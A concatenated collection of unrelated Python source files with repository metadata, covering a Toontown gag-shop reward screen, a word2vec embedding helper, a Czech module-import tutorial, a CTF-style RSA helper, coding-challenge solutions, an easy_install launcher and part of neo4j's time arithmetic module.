for i in xrange(len(task.ids)):
if task.pointsArray[i] == winningPoints:
avId = task.ids[i]
if base.cr.doId2do.has_key(avId):
toon = base.cr.doId2do[avId]
toon.setAnimState('jump', 1.0)
base.playSfx(task.celebrateSound)
return Task.done
celebrateDelay = countDownDelay + COUNT_DOWN_DURATION + DELAY_AFTER_COUNT_DOWN
celebrateTask = taskMgr.doMethodLater(celebrateDelay, celebrate, 'celebrate')
celebrateTask.counters = self.counters
celebrateTask.pointsArray = self.pointsArray
celebrateTask.ids = self.ids
celebrateTask.celebrateSound = self.celebrateSound
def reqCountVotesUp(state):
self.countVotesUp()
return Task.done
def reqCountVotesDown(state):
self.countVotesDown()
return Task.done
if self.metagameRound == TravelGameGlobals.FinalMetagameRoundIndex:
countVotesUpDelay = celebrateDelay + DELAY_AFTER_CELEBRATE
taskMgr.doMethodLater(countVotesUpDelay, reqCountVotesUp, 'countVotesUpTask')
countVotesUpTime = self.maxVotes * COUNT_UP_RATE + DELAY_AFTER_COUNT_UP
countVotesDownDelay = countVotesUpDelay + countVotesUpTime
taskMgr.doMethodLater(countVotesDownDelay, reqCountVotesDown, 'countVotesDownTask')
celebrateDelay += countVotesUpTime + self.maxVotes * COUNT_DOWN_RATE + DELAY_AFTER_COUNT_DOWN
def reqPurchase(state):
self.fsm.request('purchase')
return Task.done
purchaseDelay = celebrateDelay + DELAY_AFTER_CELEBRATE
taskMgr.doMethodLater(purchaseDelay, reqPurchase, 'purchase-trans')
if base.skipMinigameReward:
self.fsm.request('purchase')
return
def _changeCounterUp(self, task, counter, newCount, toonId):
counter.count = newCount
counter['text'] = str(counter.count)
if toonId == base.localAvatar.doId:
now = globalClock.getRealTime()
if task.lastSfxT + COUNT_SFX_MIN_DELAY < now:
base.playSfx(task.countSound, time=COUNT_SFX_START_T)
task.lastSfxT = now
def _countUpTask(self, task):
now = globalClock.getRealTime()
startT = task.getStartTime()
if now >= startT + task.duration:
for counter, toonId in zip(self.counters, self.ids):
if counter.count != counter.max:
self._changeCounterUp(task, counter, counter.max, toonId)
return Task.done
t = (now - startT) / task.duration
for counter, toonId in zip(self.counters, self.ids):
curCount = int(t * counter.max)
if curCount != counter.count:
self._changeCounterUp(task, counter, curCount, toonId)
return Task.cont
def countUp(self):
totalDelay = 0
if base.cr.newsManager.isHolidayRunning(ToontownGlobals.JELLYBEAN_TROLLEY_HOLIDAY) or base.cr.newsManager.isHolidayRunning(ToontownGlobals.JELLYBEAN_TROLLEY_HOLIDAY_MONTH):
self.rewardDoubledJellybeanLabel.show()
countUpTask = taskMgr.add(self._countUpTask, 'countUp')
countUpTask.duration = COUNT_UP_DURATION
countUpTask.countSound = self.countSound
countUpTask.lastSfxT = 0
def _changeCounterDown(self, task, counter, newCount, total, toonId):
counter.count = newCount
counter['text'] = str(counter.count)
total.count = total.startAmount + (counter.max - newCount)
if total.count > total.max:
total.count = total.max
total['text'] = str(total.count)
if total.count == total.max:
total['text_fg'] = (1, 0, 0, 1)
if toonId == base.localAvatar.doId:
now = globalClock.getRealTime()
if total.count < total.max:
minDelay = COUNT_SFX_MIN_DELAY
snd = task.countSound
startT = COUNT_SFX_START_T
else:
minDelay = OVERMAX_SFX_MIN_DELAY
snd = task.overMaxSound
startT = OVERMAX_SFX_START_T
if task.lastSfxT + minDelay < now:
task.lastSfxT = now
base.playSfx(snd, time=startT)
def _countDownTask(self, task):
now = globalClock.getRealTime()
startT = task.getStartTime()
if now >= startT + task.duration:
for counter, total, toonId in zip(self.counters, self.totalCounters, self.ids):
if counter.count != 0:
self._changeCounterDown(task, counter, 0, total, toonId)
return Task.done
t = (now - startT) / task.duration
for counter, total, toonId in zip(self.counters, self.totalCounters, self.ids):
curCount = int(counter.max * (1 - t))
if curCount != counter.count:
self._changeCounterDown(task, counter, curCount, total, toonId)
return Task.cont
def countDown(self):
totalDelay = 0
for total in self.totalCounters:
total.startAmount = total.count
countDownTask = taskMgr.add(self._countDownTask, 'countDown')
countDownTask.duration = COUNT_DOWN_DURATION
countDownTask.countSound = self.countSound
countDownTask.overMaxSound = self.overMaxSound
countDownTask.lastSfxT = 0
def countVotesUp(self):
totalDelay = 0
self.convertingVotesToBeansLabel.show()
if base.cr.newsManager.isHolidayRunning(ToontownGlobals.JELLYBEAN_TROLLEY_HOLIDAY) or base.cr.newsManager.isHolidayRunning(ToontownGlobals.JELLYBEAN_TROLLEY_HOLIDAY_MONTH):
self.rewardDoubledJellybeanLabel.show()
counterIndex = 0
for index in xrange(len(self.ids)):
avId = self.ids[index]
if self.states[index] != PURCHASE_NO_CLIENT_STATE and self.states[index] != PURCHASE_DISCONNECTED_STATE and avId in base.cr.doId2do:
self.counters[counterIndex].count = 0
self.counters[counterIndex].max = self.votesArray[index]
self.counters[counterIndex].show()
counterIndex += 1
def delayAdd(state):
state.counter.count += 1
state.counter['text'] = str(state.counter.count)
if state.toonId == base.localAvatar.doId:
base.playSfx(state.countSound)
return Task.done
for count in xrange(0, self.maxVotes):
for counter in self.counters:
index = self.counters.index(counter)
if count < counter.max:
addTask = taskMgr.doMethodLater(totalDelay, delayAdd, 'delayAdd')
addTask.counter = counter
addTask.toonId = self.ids[index]
addTask.countSound = self.countSound
totalDelay += COUNT_UP_RATE
def countVotesDown(self):
totalDelay = 0
def delaySubtract(state):
state.counter.count -= 1
state.counter['text'] = str(state.counter.count)
state.total.count += 1 * self.voteMultiplier
if state.total.count <= state.total.max:
state.total['text'] = str(int(state.total.count))
if state.total.count == state.total.max + 1:
state.total['text_fg'] = (1, 0, 0, 1)
if state.toonId == base.localAvatar.doId:
if state.total.count <= state.total.max:
base.playSfx(state.countSound)
else:
base.playSfx(state.overMaxSound)
return Task.done
for count in xrange(0, self.maxVotes):
for counter in self.counters:
if count < counter.max:
index = self.counters.index(counter)
subtractTask = taskMgr.doMethodLater(totalDelay, delaySubtract, 'delaySubtract')
subtractTask.counter = counter
subtractTask.total = self.totalCounters[index]
subtractTask.toonId = self.ids[index]
subtractTask.countSound = self.countSound
subtractTask.overMaxSound = self.overMaxSound
totalDelay += COUNT_DOWN_RATE
def exitReward(self):
self.ignore('clientCleanup')
taskMgr.remove('countUpTask')
taskMgr.remove('countVotesUpTask')
taskMgr.remove('countDownTask')
taskMgr.remove('countVotesDownTask')
taskMgr.remove('celebrate')
taskMgr.remove('purchase-trans')
taskMgr.remove('delayAdd')
taskMgr.remove('delaySubtract')
for toon in self.toons:
toon.detachNode()
del self.toons
if hasattr(self, 'toonsKeep'):
for delayDelete in self.toonsKeep:
delayDelete.destroy()
del self.toonsKeep
for counter in self.counters:
counter.reparentTo(hidden)
for total in self.totalCounters:
total.reparentTo(hidden)
self.foreground.reparentTo(hidden)
self.backgroundL.reparentTo(hidden)
self.backgroundR.reparentTo(hidden)
self.sidewalk.reparentTo(hidden)
self.sidewalkL.reparentTo(hidden)
self.sidewalkR.reparentTo(hidden)
self.door.reparentTo(hidden)
self.title.reparentTo(self.frame)
self.convertingVotesToBeansLabel.hide()
self.rewardDoubledJellybeanLabel.hide()
base.camLens.setMinFov(ToontownGlobals.DefaultCameraFov/(4./3.))
NametagGlobals.setOnscreenChatForced(0)
def _handleClientCleanup(self):
if hasattr(self, 'toonsKeep'):
for delayDelete in self.toonsKeep:
delayDelete.destroy()
del self.toonsKeep
self.ignore('clientCleanup')
def enterPurchase(self):
PurchaseBase.enterPurchase(self)
self.convertingVotesToBeansLabel.hide()
self.rewardDoubledJellybeanLabel.hide()
self.bg.reparentTo(render)
base.setBackgroundColor(0.78, 0.65, 0.53)
self.accept('purchaseStateChange', self.__handleStateChange)
self.playAgain.reparentTo(self.toon.inventory.purchaseFrame)
self.backToPlayground.reparentTo(self.toon.inventory.purchaseFrame)
self.pointDisplay.reparentTo(self.toon.inventory.purchaseFrame)
self.statusLabel.reparentTo(self.toon.inventory.purchaseFrame)
for headFrame in self.headFrames:
headFrame[1].show()
headFrame[1].reparentTo(self.toon.inventory.purchaseFrame)
if base.cr.periodTimerExpired:
base.cr.loginFSM.request('periodTimeout')
return
if not self.tutorialMode:
if not config.GetBool('disable-purchase-timer', 0):
self.timer.show()
self.timer.countdown(self.remain, self.__timerExpired)
if config.GetBool('metagame-disable-playAgain', 0):
if self.metagameRound > -1:
self.disablePlayAgain()
else:
self.timer.hide()
self.disablePlayAgain()
self.accept('disableGagPanel', Functor(self.toon.inventory.setActivateMode, 'gagTutDisabled', gagTutMode=1))
self.accept('disableBackToPlayground', self.disableBackToPlayground)
self.accept('enableGagPanel', self.handleEnableGagPanel)
self.accept('enableBackToPlayground', self.enableBackToPlayground)
for avId, headFrame in self.headFrames:
if avId != self.newbieId:
headFrame.hide()
messenger.send('gagScreenIsUp')
if base.autoPlayAgain or self.doMetagamePlayAgain():
base.transitions.fadeOut(0)
self.__handlePlayAgain()
def exitPurchase(self):
PurchaseBase.exitPurchase(self)
self.ignore('disableGagPanel')
self.ignore('disableBackToPlayground')
self.ignore('enableGagPanel')
self.ignore('enableBackToPlayground')
self.bg.reparentTo(hidden)
self.playAgain.reparentTo(self.frame)
self.backToPlayground.reparentTo(self.frame)
self.pointDisplay.reparentTo(self.frame)
self.statusLabel.reparentTo(self.frame)
self.ignore('purchaseStateChange')
base.setBackgroundColor(ToontownGlobals.DefaultBackgroundColor)
if base.autoPlayAgain or self.doMetagamePlayAgain():
base.transitions.fadeIn()
def disableBackToPlayground(self):
self.backToPlayground['state'] = DGG.DISABLED
def enableBackToPlayground(self):
self.backToPlayground['state'] = DGG.NORMAL
def disablePlayAgain(self):
self.playAgain['state'] = DGG.DISABLED
def enablePlayAgain(self):
self.playAgain['state'] = DGG.NORMAL
def enterTutorialMode(self, newbieId):
self.tutorialMode = 1
self.newbieId = newbieId
def handleEnableGagPanel(self):
self.toon.inventory.setActivateMode('purchase', gagTutMode=1)
self.checkForBroke()
def handleGagTutorialDone(self):
self.enableBackToPlayground()
def doMetagamePlayAgain(self):
if hasattr(self, 'metagamePlayAgainResult'):
return self.metagamePlayAgainResult
numToons = 0
for avId in self.ids:
if base.cr.doId2do.has_key(avId) and avId not in self.unexpectedExits:
numToons += 1
self.metagamePlayAgainResult = False
if numToons > 1:
if self.metagameRound > -1 and self.metagameRound < TravelGameGlobals.FinalMetagameRoundIndex:
self.metagamePlayAgainResult = True
return self.metagamePlayAgainResult
def setupUnexpectedExitHooks(self):
for avId in self.ids:
if base.cr.doId2do.has_key(avId):
toon = base.cr.doId2do[avId]
eventName = toon.uniqueName('disable')
self.accept(eventName, self.__handleUnexpectedExit, extraArgs=[avId])
self.unexpectedEventNames.append(eventName)
def cleanupUnexpectedExitHooks(self):
for eventName in self.unexpectedEventNames:
self.ignore(eventName)
def __handleUnexpectedExit(self, avId):
self.unexpectedExits.append(avId)
class PurchaseHeadFrame(DirectFrame):
notify = DirectNotifyGlobal.directNotify.newCategory('Purchase')
def __init__(self, av, purchaseModels):
DirectFrame.__init__(self, relief=None, image=purchaseModels.find('**/Char_Pnl'))
self.initialiseoptions(PurchaseHeadFrame)
self.statusLabel = DirectLabel(parent=self, relief=None, text='', text_scale=TTLocalizer.PstatusLabel, text_wordwrap=7.5, text_fg=(0.05, 0.14, 0.4, 1), text_pos=(0.1, 0, 0))
self.av = av
self.avKeep = DelayDelete.DelayDelete(av, 'PurchaseHeadFrame.av')
self.accept('clientCleanup', self._handleClientCleanup)
self.head = self.stateNodePath[0].attachNewNode('head', 20)
self.head.setPosHprScale(-0.22, 10.0, -0.1, 180.0, 0.0, 0.0, 0.1, 0.1, 0.1)
self.headModel = ToonHead.ToonHead()
self.headModel.setupHead(self.av.style, forGui=1)
self.headModel.reparentTo(self.head)
self.tag2Node = NametagFloat2d()
self.tag2Node.setContents(Nametag.CName)
self.av.nametag.addNametag(self.tag2Node)
self.tag2 = self.attachNewNode(self.tag2Node)
self.tag2.setPosHprScale(-0.22, 10.0, 0.12, 0, 0, 0, 0.046, 0.046, 0.046)
self.tag1Node = NametagFloat2d()
self.tag1Node.setContents(Nametag.CSpeech | Nametag.CThought)
self.av.nametag.addNametag(self.tag1Node)
self.tag1 = self.attachNewNode(self.tag1Node)
self.tag1.setPosHprScale(-0.15, 0, -0.1, 0, 0, 0, 0.046, 0.046, 0.046)
self.hide()
return
def destroy(self):
DirectFrame.destroy(self)
del self.statusLabel
self.headModel.delete()
del self.headModel
self.head.removeNode()
del self.head
self.av.nametag.removeNametag(self.tag1Node)
self.av.nametag.removeNametag(self.tag2Node)
self.tag1.removeNode()
self.tag2.removeNode()
del self.tag1
del self.tag2
del self.tag1Node
del self.tag2Node
del self.av
self.removeAvKeep()
def setAvatarState(self, state):
if state == PURCHASE_DISCONNECTED_STATE:
self.statusLabel['text'] = TTLocalizer.GagShopPlayerDisconnected % self.av.getName()
self.statusLabel['text_pos'] = (0.015, 0.072, 0)
self.head.hide()
self.tag1.hide()
self.tag2.hide()
elif state == PURCHASE_EXIT_STATE:
self.statusLabel['text'] = TTLocalizer.GagShopPlayerExited % self.av.getName()
self.statusLabel['text_pos'] = (0.015, 0.072, 0)
self.head.hide()
self.tag1.hide()
self.tag2.hide()
elif state == PURCHASE_PLAYAGAIN_STATE:
self.statusLabel['text'] = TTLocalizer.GagShopPlayerPlayAgain
self.statusLabel['text_pos'] = (0.1, -0.12, 0)
elif state == PURCHASE_WAITING_STATE:
self.statusLabel['text'] = TTLocalizer.GagShopPlayerBuying
self.statusLabel['text_pos'] = (0.1, -0.12, 0)
elif state == PURCHASE_NO_CLIENT_STATE:
Purchase.notify.warning("setAvatarState('no client state'); OK for gag purchase tutorial")
else:
Purchase.notify.warning('unknown avatar state: %s' % state)
def _handleClientCleanup(self):
self.destroy()
def removeAvKeep(self):
if hasattr(self, 'avKeep'):
self.notify.debug('destroying avKeep %s' % self.avKeep)
self.avKeep.destroy()
del self.avKeep
self.ignore('clientCleanup')
|
[
"sweep14@gmail.com"
] |
sweep14@gmail.com
|
a3e6957192f7ca7843ec9b6000732e55ff189c70
|
937a4684691447ee3848043626f73b7ec8e22e25
|
/app/embeddings/word2vecs.py
|
0ba46648b36b2ee47b5bfab8da8b187784ff682c
|
[] |
no_license
|
PCS0725/opanalyzer-backend
|
b96e7d8f17ba4858fab96fe720b7838cf9c7ef03
|
156603c2a22cf991ffc1df20d9ee87c3ed2dae09
|
refs/heads/main
| 2023-03-21T02:37:30.944025
| 2021-03-07T06:10:46
| 2021-03-07T06:10:46
| 343,015,953
| 1
| 0
| null | 2021-03-07T06:10:47
| 2021-02-28T03:58:41
| null |
UTF-8
|
Python
| false
| false
| 781
|
py
|
from app.config import WORD2VEC_MODEL
import pandas as pd
import gensim
from gensim.models import Word2Vec
import pickle
class Word2Vecs:
def getEmbeddings(self, df):
glove_vectors = pickle.load(open(WORD2VEC_MODEL, 'rb'))
X = []
for row in df.clean:
sent = []
lst = row.strip('][').split(', ')
for word in lst:
wd = word.replace("'", "")
if(wd in glove_vectors.vocab):
vec = glove_vectors[wd]
sent.append(round(sum(vec)/len(vec), 5))
else:
sent.append(0)
X.append(sent)
embeds_df = pd.DataFrame(X)
embeds_df['sentiment'] = df['sentiment']
return embeds_df
|
[
"prabbhat25199@gmail.com"
] |
prabbhat25199@gmail.com
|
815e2a00511f0d60f1475f816c1caf77ed92aa6e
|
99e3805c58d7f0a341ef2a780422307e6f30ad22
|
/01-basics/imports.py
|
2e08de9963523e87b3f1081f53d45b119944e6e4
|
[] |
no_license
|
WitchoutName/Python
|
8c488a7755aa888e4d5a91bfca575500f9209276
|
2dbc0cd8ea4c621a941ecff5abd010ae88ef53c6
|
refs/heads/main
| 2023-01-30T05:20:22.007636
| 2020-11-24T10:39:13
| 2020-11-24T10:39:13
| 302,704,739
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,496
|
py
|
'''
Importování modulů v Pythonu
Větší programy je žádoucí členit do samostatných modulů.
Modul je soubor obsahující definice a příkazy v Pythonu.
Moduly v Pythonu jsou uloženy v samostatných souborech s příponou .py.
Definice uvnitř modulů mohou být importovány do jiných modulů nebo do interaktivní pythonovské konzoly.
Připojení modulů provádíme klíčovým slovem import.
'''
'''
Příklad importu modulu math. V tomto případě můžeme pomocí tečkového operátoru využít všechny atributy a funkce,
které nám modul math nabízí.
'''
import math
print(math.pi)
print('Goniometrické funkce: sin 45° = {}, cos 45° = {}'.format(math.sin(45), math.cos(45)))
'''
Příklad importu modulu sys a jedné jeho funkce path. Použijeme k tomu konstrukci:
from jméno_modulu import jméno_funkce
'''
#from sys import path
#print(path) # Zobrazuje seznam (list) cest k adresářům, které aplikace využívá
'''
Moduly math a sys patří k interním modulům, jež jsou součástí standardní instalace Pythonu.
Externí moduly jsou distribuovány systémem balíčků (packages) a musí být instalovány pomocí nástroje pip.
pip install <jméno_balíčku>
Balíček můžeme odinstalovat příkazem:
pip uninstall <jméno_balíčku>
Používáme-li virtuální prostředí (virtual environment), jsou nainstalované balíčky ukládány v adresáři tohoto prostředí
(v našem případě venv) v podsložkách Lib a site-packages.
Přehled všech instalovaných balíčků získáme příkazem:
pip list
Můžeme také vytvořit soubor requirements.txt, který obsahuje záznam všech tzv. závislostí naší aplikace - čili
informace o všech balíčcích, které je nutné do virtuálního prostředí nainstalovat, aby aplikace mohla fungovat.
Vytvoření souboru requirements.txt provedeme příkazem:
pip freeze > requirements.txt
Zobrazení podrobnějších informací o některém z nainstalovaných balíčků získáme příkazem:
pip show <jméno_balíčku>
Automatickou instalaci všech závislostí zaznamenaných v souboru requirements.txt provedeme příkazem:
pip install -r requirements.txt
'''
# V konzoli virtuálního prostředí proveďte instalaci externího balíčku camelcase
# (venv) E:\python\projekt\venv>pip install camelcase
# Poté tento balíček importujte
import camelcase
c = camelcase.CamelCase() # Konstruktor třídy CamelCase() vytvoří objekt v proměnné c
txt = 'ahoj světáku'
print(c.hump(txt)) # Metoda hump() přeformátuje předaný řetězec podle zásad camel syntaxe (velká první písmena slov)
"""
Cvičení 4:
Použijte vhodné moduly v Pythonu (včetně jejich případné instalace) k tomu, abyste:
1) vypsali aktuální datum a čas
2) vypsali datum velikonoční neděle (easter) v následujících 5 letech
3) vypsali nejbližší rok, v němž bude Štědrý den v neděli
K řešení prvního úkolu je možné doporučit importovat interní modul datetime
Řešení dalších dvou úkolů můžete odvodit z příkladů v dokumentaci k externímu modulu dateutil - viz https://pypi.org/project/python-dateutil/
"""
from dateutil import easter
from dateutil.rrule import *
from datetime import *
from dateutil.relativedelta import *
from dateutil.parser import *
print(f"date {datetime.now()}")
for year in range(2021, 2026):
print(f"easter {easter.easter(year)}")
print(f"{rrule(YEARLY, bymonth=12, bymonthday=24, byweekday=SU).after(datetime.now())}")
|
[
"noreply@github.com"
] |
WitchoutName.noreply@github.com
|
7feb66b409ad0fe39a9c6b5db78af52698879c16
|
b64425872561b609e9c450bb015e85419d1923c6
|
/day-02/part-2/jules.py
|
4c90ae39bff1dade9d33ca5eca6ea5fdcec366f1
|
[
"MIT"
] |
permissive
|
lypnol/adventofcode-2017
|
4c58fa735b99d197fc4bba974422dd034cba01d1
|
03ced3df3eb80e5c7965c4120e3932919067cb15
|
refs/heads/master
| 2021-05-06T19:19:21.815272
| 2018-03-25T20:05:07
| 2018-03-25T20:05:07
| 112,111,717
| 16
| 4
|
MIT
| 2019-10-04T08:55:19
| 2017-11-26T19:49:35
|
Python
|
UTF-8
|
Python
| false
| false
| 698
|
py
|
from submission import Submission
class JulesSubmission(Submission):
def run(self, s):
# :param s: input in string format
# :return: solution flag
# your solution code goes here
def find_for_row(row):
for fi in range(len(row)):
for si in range(fi + 1, len(row)):
if row[fi] > row[si] and row[fi] % row[si] == 0:
return int(row[fi] / row[si])
elif row[si] % row[fi] == 0:
return int(row[si] / row[fi])
row_list = [[int(x) for x in row.split()] for row in s.split('\n')]
return str(sum([find_for_row(row) for row in row_list]))
|
[
"jules.denardou@datadoghq.com"
] |
jules.denardou@datadoghq.com
|
7152195962e61a7ae20ea2ef463bfc2c5290927a
|
4ec1b366bb46e747d9b82f648bfa931d13943939
|
/pico.py
|
beab3d4d6f6220eb71353e9e8bd5f99cfa3a7a79
|
[] |
no_license
|
Random-Person2552/pythonBackup
|
b59e6b414c824cf9bfe31ffb8a1e410b6158b5a2
|
273fdcbf991b28e6392765e5646fc9871169f435
|
refs/heads/master
| 2020-05-29T10:49:52.754539
| 2019-05-28T21:10:47
| 2019-05-28T21:10:47
| 189,103,649
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,809
|
py
|
import math
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
def modinv(a, m):
g, x, y = egcd(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return x % m
def gcd(a, b):
if (a == 0):
return b
return gcd(b % a, a)
def phi(n):
result = 1
for i in range(2, n):
if (gcd(i, n) == 1):
result+=1
return result
def phi_two(q, p):
q = q -1
p = p -1
return q * p
def iroot(k, n):
u, s = n, n+1
while u < s:
s = u
t = (k-1) * s + n // pow(s, k-1)
u = t // k
return s
n = 13560417960801296839882552449418731731399677948669445254256179042180371513049687
#p = 153143042272527868798412612417204434156935146874282990942386694020462861918068684561281763577034706600608387699148071015194725533394126069826857182428660427818277378724977554365910231524827258160904493774748749088477328204812171935987088715261127321911849092207070653272176072509933245978935455542420691737433
#q = n / p
e = 65537
#phi = phi(n)
c = 11979998127328309483755159511700985576751434399944560644272745062116136412266657
#d = 11249620277260260736493499765360743175678915580377635061547739419630203072966392
d = modinv(e, n)
print d
1021317628866569678214494683807765890552004323556950987312904254273855967240404229687321920774113531353309058801650117748282449429534527831526726955433537842422750995408367392389615393138286228321608610204291980950474688151965286170998997753025612993603377505346459549402364940463071518321965380953981837
#print n
#x = 2205316413931134031046440767620541984801091216351222789180593875373829950860542792110364325728088504479780803714561464250589795961097670884274813261496112882580892020487261058118157619586156815531561455215290361274334977137261636930849125 ** 3
#print x
#print x % n
# D = 232090017039379620941582149411005346720036016154747258099258175670240275266053377370543133895187036673098124917725486421794871894564257182887949472012324016772235997598559829941232312281741562756820071589674847373169652725135709705123641203225818305899493434046795277007635702859705572766056279941829066
#print iroot(2205316413931134031046440767620541984801091216351222789180593875373829950860542792110364325728088504479780803714561464250589795961097670884274813261496112882580892020487261058118157619586156815531561455215290361274334977137261636930849125, 3)
893887504690392820638378600918539954071845726463729762686245696712627201749694290077771929641267193945315897516888792007230598938351307761934133296592682621582943313237044410930385231617635012267813760389313823757777109307359237333810027313775778518681000801371850487907636740634637542666575900080961590
|
[
"jared@overwatchdmc.com"
] |
jared@overwatchdmc.com
|
0a6cdefe90e54b7d2c191e658e94a130c0d8e36b
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_373/ch52_2020_04_29_18_16_04_599137.py
|
0122d8cd2bdc4fe457101602678522d016aa8163
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 75
|
py
|
x=[]
y=[]
def calcula_total_da_nota (x,y,i):
t= x[i]* y[i]
return t
|
[
"you@example.com"
] |
you@example.com
|
74fd3e01423e3b6dfd17bab74791ab088d301a07
|
8986bd27f551aaf90da92ea9906a5d5a000f1508
|
/TopCoder-Solutions/SRM's/AlienAndPassword.py
|
78c4d95a6e914187ddbb3facb788772566e43ad9
|
[] |
no_license
|
siddeshshewde/Competitive-Programming
|
bb5a9aa82136a7e976b00d7f6087b96a7f7cda55
|
5b525ebfdc4fc57ab1296c9f491221fc34f636bf
|
refs/heads/master
| 2020-05-29T19:42:06.020432
| 2020-04-05T15:15:37
| 2020-04-05T15:15:37
| 83,057,075
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,263
|
py
|
# Problem : AlienAndPassword
# Used In : SRM 605
# Date : 01.21.2014
# Category : Brute Force, String Manipulation
# Division : 2
# Level : 1
# Round : 1
# Points : 250
# Difficulty : Easy
# Problem Type : Single
# Description : https://community.topcoder.com/stat?c=problem_statement&pm=12950
# Class Name : AlienAndPassword
# Method Name : getNumber
# Return Type : Int
# Arg Types : String
"""
## Problem Statement
Alien Fred wants to destroy the Earth, but he forgot the password that activates the planet destroyer.
You are given a String S. Fred remembers that the correct password can be obtained from S by erasing exactly one character.
Return the number of different passwords Fred needs to try.
## Definition
Class: AlienAndPassword
Method: getNumber
Parameters: String
Returns: int
Method signature: int getNumber(String S)
(be sure your method is public)
## Limits
Time limit (s): 840.000
Memory limit (MB): 64
## Constraints
- S will contain between 1 and 50 characters, inclusive.
- Each character in S will be an uppercase English letter ('A'-'Z').
## Examples
"A"
Returns: 1
In this case, the only password Fred needs to try is an empty string.
"ABA"
Returns: 3
The following three passwords are possible in this case: "BA", "AA", "AB".
"AABACCCCABAA"
Returns: 7
"AGAAGAHHHHFTQLLAPUURQQRRRUFJJSBSZVJZZZ"
Returns: 26
"ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ"
Returns: 1
Regardless of which character we erase, we will always obtain the same string. Thus there is only one possible password: the string that consists of 49 'Z's.
**This problem statement is the exclusive and proprietary property of TopCoder, Inc. Any unauthorized use or reproduction of this information
without the prior written consent of TopCoder, Inc. is strictly prohibited. (c)2003, TopCoder, Inc. All rights reserved.**
"""
#Solution
class AlienAndPassword:
def getNumber(self, s):
n = 1
for i in range (1, len(s)):
if s[i] != s[i-1]:
n = n+1
return n
# Points Received - 249.89
|
[
"noreply@github.com"
] |
siddeshshewde.noreply@github.com
|
b226c2d3f5ac9b814e1f40847f21c0c0929005d6
|
f2a2f41641eb56a17009294ff100dc9b39cb774b
|
/current_session/python/2136.py
|
85d10060df53dffdce504322686c01c2cfa25b8e
|
[] |
no_license
|
YJL33/LeetCode
|
0e837a419d11d44239d1a692140a1468f6a7d9bf
|
b4da922c4e8406c486760639b71e3ec50283ca43
|
refs/heads/master
| 2022-08-13T01:46:14.976758
| 2022-07-24T03:59:52
| 2022-07-24T04:11:32
| 52,939,733
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 522
|
py
|
from typing import List
class Solution:
def earliestFullBloom(self, plantTime: List[int], growTime: List[int]) -> int:
# sort based on grow Time
gt = []
for i in range(len(growTime)):
gt.append((growTime[i], i))
gt.sort(reverse=True)
total_plant_time = sum(plantTime)
bloom_days = []
for t, i in gt:
total_plant_time -= plantTime[i]
bloom_days.append(total_plant_time-t)
return sum(plantTime)-min(bloom_days)
|
[
"yunjun.l33@gmail.com"
] |
yunjun.l33@gmail.com
|
786942c01ede93b705ab7b420dcbbaad7effe584
|
1dfeaa55dbd04dec8413657db1f636365d5af893
|
/venv/Scripts/easy_install-script.py
|
72a0acb135552e3161137bbe29363c060d2687e4
|
[] |
no_license
|
ghassenjebari/Contact
|
836baf50ff5dc54f667e38aab315e61bd2bf2c31
|
c0f7e29684e21123c0206b6fa39996b2002ad163
|
refs/heads/master
| 2022-10-03T04:58:16.310055
| 2020-06-05T10:38:30
| 2020-06-05T10:38:30
| 268,900,567
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 455
|
py
|
#!C:\Users\ghassen\PycharmProjects\repertoire\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
|
[
"ghassenjebari@users.noreply.github.com"
] |
ghassenjebari@users.noreply.github.com
|
3d03ca482cac616f4050c2adbe75fbcc17b9aceb
|
1e08e5b65868bdae9616ca940f233a4309502410
|
/neo4s/bin/neo4j/time/arithmetic.py
|
67028e43e9fa2459f3d5cebfffab18bf328b57e4
|
[
"Apache-2.0"
] |
permissive
|
omerl13/neo4s
|
7424db9f5b455a8322f13a0b4c4a99cf54acf839
|
5471818838099310a153d2c0844cc3c0f1943b79
|
refs/heads/master
| 2023-05-28T14:31:42.259182
| 2020-07-24T09:44:46
| 2020-07-24T09:44:46
| 121,294,087
| 2
| 5
|
Apache-2.0
| 2023-05-12T14:10:23
| 2018-02-12T19:51:46
|
Python
|
UTF-8
|
Python
| false
| false
| 4,038
|
py
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) 2002-2020 "Neo4j,"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from math import isnan
def nano_add(x, y):
"""
>>> 0.7 + 0.2
0.8999999999999999
>>> -0.7 + 0.2
-0.49999999999999994
>>> nano_add(0.7, 0.2)
0.9
>>> nano_add(-0.7, 0.2)
-0.5
:param x:
:param y:
:return:
"""
return (int(1000000000 * x) + int(1000000000 * y)) / 1000000000
def nano_sub(x, y):
"""
>>> 0.7 - 0.2
0.49999999999999994
>>> -0.7 - 0.2
-0.8999999999999999
>>> nano_sub(0.7, 0.2)
0.5
>>> nano_sub(-0.7, 0.2)
-0.9
:param x:
:param y:
:return:
"""
